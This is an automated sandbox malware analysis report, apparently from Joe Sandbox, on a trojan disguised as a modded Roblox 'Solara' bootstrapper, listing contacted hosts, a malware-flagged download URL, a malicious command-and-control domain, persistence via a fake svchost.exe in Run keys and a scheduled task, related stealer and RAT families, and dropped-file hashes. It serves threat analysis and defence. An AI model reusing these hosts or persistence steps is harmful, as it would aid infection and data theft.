                                                                                                                            https://www.newtonsoft.com/jsonschemaBootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustpsvchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBAC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://127.0.0.1:6463BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurisvchost.exe, 0000000E.00000003.1680341835.0000029107553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1647116196.0000029107553000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trustcsvchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://Passport.NET/STSsvchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xmlsvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://edge-term4-lhr2.roblox.comBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://contoso.com/powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://Passport.NET/tbsvchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://signup.live.com/signup.aspxsvchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdt:RequestedUsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://8049c006.solaraweb-alj.pages.dev/download/static/files/SolaoBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsde:Sesvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://schemas.microsoft.svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://upx.sf.netAmcache.hve.12.drfalse
                                                                                                                                                                                                high
IP              Domain                       Country        ASN    ASN Name             Malicious
208.95.112.1    ip-api.com                   United States  53334  TUT-ASUS             false
128.116.119.3   edge-term4-lhr2.roblox.com   United States  22697  ROBLOX-PRODUCTIONUS  false
147.185.221.24  award-adware.gl.at.ply.gg    United States  12087  SALSGIVERUS          true
104.21.93.27    getsolara.dev                United States  13335  CLOUDFLARENETUS      false
104.20.22.46    nodejs.org                   United States  13335  CLOUDFLARENETUS      false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566238
Start date and time: 2024-12-01 20:07:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sDKRz09zM7.exe (renamed because the original name is a hash value)
Original Sample Name: 51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@32/33@6/6
EGA Information:
• Successful, ratio: 9.1%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 245
• Number of non-executed functions: 10
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.190.147.6, 20.190.177.84, 20.190.177.19, 20.190.147.8, 20.190.177.82, 20.190.177.147, 20.190.147.4, 20.190.147.1, 20.189.173.20
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target BootstrapperV1.23_ModdedByHisako.exe, PID 7424 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1148 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1640 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7900 because it is empty
• Execution Graph export aborted for target sDKRz09zM7.exe, PID 7316 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 5636 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7060 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7640 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7732 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: sDKRz09zM7.exe
Time      Type             Description
14:08:02  API Interceptor  78x Sleep call for process: BootstrapperV1.23_ModdedByHisako.exe modified
14:08:03  API Interceptor  63x Sleep call for process: powershell.exe modified
14:08:29  API Interceptor  1x Sleep call for process: WerFault.exe modified
14:09:17  API Interceptor  38x Sleep call for process: not rat.exe modified
20:09:13  Task Scheduler   Run new task: svchost, path: C:\Users\user\AppData\Roaming\svchost.exe
20:09:15  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, svchost = C:\Users\user\AppData\Roaming\svchost.exe
20:09:23  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, svchost = C:\Users\user\AppData\Roaming\svchost.exe
20:09:32  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              208.95.112.1miIs5mgmnJ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              5IuEMtvQV5.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                              nbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                                                              jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                                                              Opera.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                                                                              • ip-api.com/xml/?fields=countryCode,query
                                                                                                                                                                                                                              88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • www.ip-api.com/line/?fields=16401
                                                                                                                                                                                                                              saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                              88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • www.ip-api.com/line/?fields=16401
                                                                                                                                                                                                                              file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                                                                                                                              • ip-api.com/json
                                                                                                                                                                                                                              128.116.119.3kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          RFAwChXSve.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            www.nodejs.orgkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            getsolara.devkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                                                            nodejs.orgkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                                                            edge-term4-lhr2.roblox.comkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                                                            https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 128.116.119.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ROBLOX-PRODUCTIONUS | kwlYObMOSn.exe | malicious | XWorm | 128.116.119.3
ROBLOX-PRODUCTIONUS | bootstraper.exe | malicious | Unknown | 128.116.119.3
ROBLOX-PRODUCTIONUS | bootstraper.exe | malicious | Unknown | 128.116.119.3
ROBLOX-PRODUCTIONUS | 8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 128.116.123.3
ROBLOX-PRODUCTIONUS | KKjubdmzCR.exe | malicious | DCRat, PureLog Stealer, zgRAT | 128.116.123.3
ROBLOX-PRODUCTIONUS | AYUGPPBj0x.exe | malicious | DCRat | 128.116.44.3
ROBLOX-PRODUCTIONUS | IM3OLcx7li.exe | malicious | XWorm | 128.116.44.4
ROBLOX-PRODUCTIONUS | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | 128.116.123.4
ROBLOX-PRODUCTIONUS | la.bot.arm.elf | malicious | Unknown | 128.116.110.16
ROBLOX-PRODUCTIONUS | cgqdM4IA7C.exe | malicious | XWorm | 128.116.21.4
TUT-ASUS | miIs5mgmnJ.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | 5IuEMtvQV5.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | nbothjkd.exe | malicious | Blackshades | 208.95.112.1
TUT-ASUS | jgesfyhjsefa.exe | malicious | Blackshades | 208.95.112.1
TUT-ASUS | Opera.exe | malicious | ZTrat | 208.95.112.1
TUT-ASUS | 88851n80.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | saloader.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
TUT-ASUS | 88851n80.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | file.exe | malicious | HackBrowser, Xmrig | 208.95.112.1
SALSGIVERUS | miIs5mgmnJ.exe | malicious | AsyncRAT, XWorm | 147.185.221.24
SALSGIVERUS | 88xEblpl6Y.exe | malicious | XWorm | 147.185.221.24
SALSGIVERUS | loligang.arm.elf | malicious | Mirai | 147.185.47.212
SALSGIVERUS | loligang.sh4.elf | malicious | Mirai | 65.199.17.173
SALSGIVERUS | mipsel.nn.elf | malicious | Mirai, Okiru | 147.168.113.41
SALSGIVERUS | mips.elf | malicious | Mirai | 147.170.50.225
SALSGIVERUS | apep.x86.elf | malicious | Mirai | 147.176.207.118
SALSGIVERUS | CZxDiTktSY.exe | malicious | XWorm | 147.185.221.24
SALSGIVERUS | TcQOmn7lnP.exe | malicious | XWorm | 147.185.221.24
SALSGIVERUS | owuP726k3d.exe | malicious | AsyncRAT, XWorm | 147.185.221.19
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 5fEYPS3M8Q.exe | malicious | XWorm | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | 1d5sraR1S1.exe | malicious | AgentTesla | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC Stealer | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | back.ps1 | malicious | Unknown | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | og.ps1 | malicious | Unknown | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | bold.ps1 | malicious | Unknown | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | ad.ps1 | malicious | Unknown | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | invoice-6483728493.pdf .js | malicious | RHADAMANTHYS | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | gKWbina3a4.bat | malicious | Stealerium | 128.116.119.3, 104.21.93.27, 104.20.22.46
3b5074b1b5d032e5620f69f9f700ff0e | tnsoldfik82.bat | malicious | Abobus Obfuscator, Braodo | 128.116.119.3, 104.21.93.27, 104.20.22.46
No context
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                                            Entropy (8bit):1.2452632277344875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:eIJHcROr0bU9+dQ1aWxUlRpCTZizuiFFZ24lO8o:NZcRRbG+dQ1ama/QZizuiFFY4lO8o
                                                                                                                                                                                                                                            MD5:06BC2792CD6E60E8A1901A7282368652
                                                                                                                                                                                                                                            SHA1:2987EF377F9C2C186D4F70A14F56829B124F6DF2
                                                                                                                                                                                                                                            SHA-256:E28156C589F18B70C3F749F1CF16B527CBD31B06CE5E8B388A980DFA5E88A763
                                                                                                                                                                                                                                            SHA-512:181E9B918E1198806ECA920CD7017B003F7EFE6D956FDA2300A25C07B6FC00AF9457D5563C30F6699A64002BD901ACBD88D9C5B4C2F028958C2C191FD9002D7E
                                                                                                                                                                                                                                            Malicious:false
Preview:Version=1..EventType=CLR20r3..EventTime=133775536933254068..ReportType=2..Consent=1..UploadTime=133775536967629056..ReportStatus=524384..ReportIdentifier=5aef9a65-c520-4a5a-a317-f37d12631f57..IntegratorReportIdentifier=bdeb0d00-0488-44bb-bafa-f833230260e7..Wow64Host=34404..NsAppName=BootstrapperV1.23_ModdedByHisako.exe..OriginalFilename=SolaraBootstrapper.exe..AppSessionGuid=00001d00-0001-0014-3bd7-31552444db01..TargetAppId=W:00062fe173631cadc4a7695d39957a12de9c00000000!0000ac4ad252cc5834f60347
Process:C:\Windows\System32\WerFault.exe
File Type:Mini DuMP crash report, 16 streams, Sun Dec 1 19:08:15 2024, 0x1205a4 type
Category:dropped
Size (bytes):576140
Entropy (8bit):3.20586189010752
Encrypted:false
SSDEEP:6144:nuWskgJ3QZp3vz4aDBAHieBzBhH5CT1idI+kC99cgEpGo8gqaEF:nnuQZpL4aDqpgq
MD5:0CF671E67EF001EA83D4A96226C4559E
SHA1:86CF767CEB7E83D7C85242841F11C8F074E29548
SHA-256:3BD5DC30A7E1E6920BC062FCAAB75E5637F1B0568EE9F86BF4223BD1A397A222
SHA-512:98D035593B66F738A1A861EDCFB976EED53F6AD06C44535B5065FFC9AB1F79358D38C13E9AA310ADFE7A1D97A96BCB35912ACE847B8164AE91BE51696BF4E5DC
Malicious:false
